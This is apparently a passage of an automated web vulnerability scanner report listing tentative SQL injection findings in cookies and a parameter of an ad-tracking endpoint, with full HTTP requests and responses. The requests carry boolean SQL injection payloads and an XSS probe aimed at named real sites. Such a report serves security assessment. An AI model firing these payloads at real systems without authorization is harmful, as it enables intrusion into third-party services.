Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d2--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.19. http://tap.rubiconproject.com/oz/sensor [csi2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The csi2 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the csi2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.20. http://tap.rubiconproject.com/oz/sensor [dq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The dq cookie appears to be vulnerable to SQL injection attacks. The payloads 15011000'%20or%201%3d1--%20 and 15011000'%20or%201%3d2--%20 were each submitted in the dq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: dq=13|4|9|15011000; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.21. http://tap.rubiconproject.com/oz/sensor [k parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The k parameter appears to be vulnerable to SQL injection attacks. The payloads 16361420'%20or%201%3d1--%20 and 16361420'%20or%201%3d2--%20 were each submitted in the k parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d1--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d2--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.22. http://tap.rubiconproject.com/oz/sensor [khaos cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The khaos cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the khaos cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d1--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
